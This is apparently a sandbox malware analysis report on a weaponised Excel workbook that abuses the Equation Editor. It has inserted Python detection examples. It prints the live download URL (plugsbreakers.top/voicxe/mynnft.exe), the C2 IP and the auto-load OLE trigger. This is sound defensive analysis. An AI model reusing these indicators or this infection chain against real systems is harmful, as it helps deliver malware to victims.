Source: PO906-645S790768.xlam.xlsx |
Avira: detected |
Source: http://plugsbreakers.top/voicxe/mynnft.exe |
Virustotal: Detection: 7% |
Source: PO906-645S790768.xlam.xlsx |
ReversingLabs: Detection: 66% |
Source: PO906-645S790768.xlam.xlsx |
Virustotal: Detection: 47% |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Network connect: IP: 66.63.187.171 Port: 80 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_035904F5 WinExec,ExitProcess, |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_03590429 LoadLibraryW,URLDownloadToFileW, |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_035904AA URLDownloadToFileW, |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_03590515 ExitProcess, |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_03590397 URLDownloadToFileW, |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_03590443 URLDownloadToFileW, |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_0359037E ExitProcess, |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_035903B3 URLDownloadToFileW, |
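The behaviour recorded above (EXCEL.EXE starting EQNEDT32.EXE with -Embedding, the Equation Editor process then resolving a name, fetching a file with URLDownloadToFileW and reaching WinExec) is a chain that endpoint telemetry can flag at each stage. The Python below is an added example, not part of the sandbox report and not Joe Sandbox code: it runs three simple rules over Sysmon-style records (Event ID 1 process create, 22 DNS query, 3 network connect). The sample events are constructed to mirror the process tree and traffic listed in the report; the field names follow Sysmon's naming, and the parent of EXCEL.EXE is left unset because the report lists it as unknown.

```python
import ntpath

# Constructed Sysmon-style records (Event ID 1 = process create, 22 = DNS
# query, 3 = network connect) mirroring the process tree and traffic listed in
# the report; these are illustrative sample events, not the sandbox's own log.
# The parent of EXCEL.EXE is reported as unknown, so it is left unset here.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 1100, "ParentProcessId": 0,
     "Image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "CommandLine": r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding',
     "ParentImage": None},
    {"EventID": 1, "ProcessId": 2208, "ParentProcessId": 1100,
     "Image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "CommandLine": r'"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding',
     "ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"},
    {"EventID": 22, "ProcessId": 2208,
     "Image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "QueryName": "plugsbreakers.top"},
    {"EventID": 3, "ProcessId": 2208,
     "Image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "DestinationIp": "66.63.187.171", "DestinationPort": 80},
]

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
EQNEDT32 = "eqnedt32.exe"


def _image_name(path):
    """Case-insensitive basename of a Windows path (None-safe)."""
    return ntpath.basename(path or "").lower()


def detect(events):
    """Return alerts for the three stages visible in the report.

    1. an Office application spawning the Equation Editor,
    2. the Equation Editor resolving names or opening TCP connections
       (it has no legitimate reason to talk to the network),
    3. the Equation Editor spawning a child process (the WinExec stage;
       not exercised by SAMPLE_EVENTS, which stop at the download).
    """
    alerts = []
    eqnedt_pids = set()
    for ev in events:
        eid = ev.get("EventID")
        image = _image_name(ev.get("Image"))
        if eid == 1:
            parent = _image_name(ev.get("ParentImage"))
            if image == EQNEDT32:
                eqnedt_pids.add(ev["ProcessId"])
                if parent in OFFICE_IMAGES:
                    alerts.append({"rule": "office_spawns_eqnedt32",
                                   "pid": ev["ProcessId"],
                                   "detail": f"{parent} -> {ev.get('CommandLine', '')}"})
            elif parent == EQNEDT32 or ev.get("ParentProcessId") in eqnedt_pids:
                alerts.append({"rule": "eqnedt32_spawns_child",
                               "pid": ev["ProcessId"],
                               "detail": ev.get("CommandLine", "")})
        elif eid in (3, 22) and (image == EQNEDT32 or ev.get("ProcessId") in eqnedt_pids):
            if eid == 22:
                detail = f"dns {ev.get('QueryName')}"
            else:
                detail = f"tcp {ev.get('DestinationIp')}:{ev.get('DestinationPort')}"
            alerts.append({"rule": "eqnedt32_network",
                           "pid": ev["ProcessId"], "detail": detail})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["rule"], alert["pid"], alert["detail"])
```

On the sample events the first rule fires for PID 2208 and the network rule fires twice (once for the DNS query, once for the TCP connect to 66.63.187.171:80); the child-process rule stays quiet because the report shows no child of EQNEDT32.EXE.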
Source: global traffic |
DNS query: name: plugsbreakers.top |
Source: global traffic |
TCP traffic: 192.168.2.22:49163 -> 66.63.187.171:80 (8 entries) |
Source: global traffic |
TCP traffic: 66.63.187.171:80 -> 192.168.2.22:49163 (6 entries) |
Source: Joe Sandbox View |
ASN Name: ASN-QUADRANET-GLOBALUS |
Source: global traffic |
HTTP traffic detected: GET /voicxe/mynnft.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: plugsbreakers.top
Connection: Keep-Alive |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_03590429 LoadLibraryW,URLDownloadToFileW, |
Source: global traffic |
DNS traffic detected: DNS query: plugsbreakers.top |
Source: EQNEDT32.EXE, 00000001.00000002.510778876.00000000002E3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://plugsbreakers.top/voicxe/mynnft.exeQHU |
Source: EQNEDT32.EXE, 00000001.00000002.510778876.00000000002E3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://plugsbreakers.top/voicxe/mynnft.exeiEHT2T |
Source: EQNEDT32.EXE, 00000001.00000002.510902224.0000000003590000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://plugsbreakers.top/voicxe/mynnft.exej |
Source: sheet1.xml, type: SAMPLE |
Matched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Memory allocated: 770B0000 page execute and read and write |
Source: PO906-645S790768.xlam.xlsx |
OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false |
Source: sheet1.xml, type: SAMPLE |
Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing |
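The rule match above keys on the combination of a legacyDrawing reference and an auto-loading OLE object in a worksheet part: an oleObject marked autoLoad is activated when the workbook is opened, which is how the embedded object reaches EQNEDT32.EXE without the user clicking anything. The Python below is an added example, not the ditekSHen rule and not code from this report: it opens an .xlsx as the zip container it is and reports every oleObject with autoLoad set in any xl/worksheets/sheetN.xml, together with whether that sheet also carries a legacyDrawing element. The two worksheet XML samples are constructed for the example; the container built by build_xlsx is the minimum zipfile needs, not a valid workbook. progId Equation.3 is the class name of the Microsoft Equation Editor.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Constructed worksheet part modelled on an xl/worksheets/sheetN.xml that
# embeds an auto-loading OLE object alongside a legacyDrawing reference.
# Illustrative sample only, not the sheet1.xml from the analysed document.
# progId Equation.3 is the class name of the Microsoft Equation Editor.
SUSPICIOUS_SHEET_XML = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
           xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheetData/>
  <legacyDrawing r:id="rId1"/>
  <oleObjects>
    <oleObject progId="Equation.3" shapeId="1025" r:id="rId2" autoLoad="true"/>
  </oleObjects>
</worksheet>
"""

# Ordinary sheet with no embedded objects, for contrast (also constructed).
BENIGN_SHEET_XML = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <sheetData><row r="1"><c r="A1"><v>1</v></c></row></sheetData>
</worksheet>
"""

SHEET_PART = re.compile(r"xl/worksheets/sheet\d+\.xml")


def build_xlsx(sheet_xml):
    """Zip a single worksheet part into a minimal in-memory .xlsx container."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr("xl/worksheets/sheet1.xml", sheet_xml)
    return buf.getvalue()


def _local(tag):
    """Strip the XML namespace prefix ElementTree attaches to a tag."""
    return tag.rsplit("}", 1)[-1]


def _is_true(value):
    """OOXML booleans may be written as true/false or 1/0."""
    return (value or "").strip().lower() in ("true", "1")


def scan_xlsx(data):
    """Return one finding per auto-loading oleObject found in any worksheet part."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not SHEET_PART.fullmatch(name):
                continue
            root = ET.fromstring(zf.read(name))
            elements = list(root.iter())
            has_legacy_drawing = any(_local(e.tag) == "legacyDrawing" for e in elements)
            for e in elements:
                if _local(e.tag) == "oleObject" and _is_true(e.get("autoLoad")):
                    findings.append({
                        "part": name,
                        "progId": e.get("progId", ""),
                        "legacyDrawing": has_legacy_drawing,
                    })
    return findings


if __name__ == "__main__":
    print(scan_xlsx(build_xlsx(SUSPICIOUS_SHEET_XML)))
    print(scan_xlsx(build_xlsx(BENIGN_SHEET_XML)))
```

The check deliberately matches on element names without binding to a namespace, so it still works on files whose sheet XML uses a non-default prefix; a sheet that declares autoLoad but no legacyDrawing is still reported, with legacyDrawing set to False, since the auto-load alone is the part that triggers the object on open.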
Source: classification engine |
Classification label: mal96.expl.winXLSX@2/2@1/1 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\Desktop\~$PO906-645S790768.xlam.xlsx |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\AppData\Local\Temp\CVR82F4.tmp |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File read: C:\Users\desktop.ini |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
File read: C:\Windows\System32\drivers\etc\hosts |
Source: unknown |
Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: wow64win.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: wow64cpu.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: msi.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: cryptsp.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: rpcrtremote.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: dwmapi.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: version.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: secur32.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: winhttp.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: webio.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: iphlpapi.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: winnsi.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: dnsapi.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: dhcpcsvc6.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: nlaapi.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: dhcpcsvc.dll |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: rasadhlp.dll |
Source: Window Recorder |
Window detected: More than 3 window changes detected |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Source: PO906-645S790768.xlam.xlsx |
Initial sample: OLE indicators vbamacros = False |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX (5 occurrences) |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3376 |
Thread sleep time: -60000s >= -30000s |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
API call chain: ExitProcess graph end node |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_0359051C mov edx, dword ptr fs:[00000030h] |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |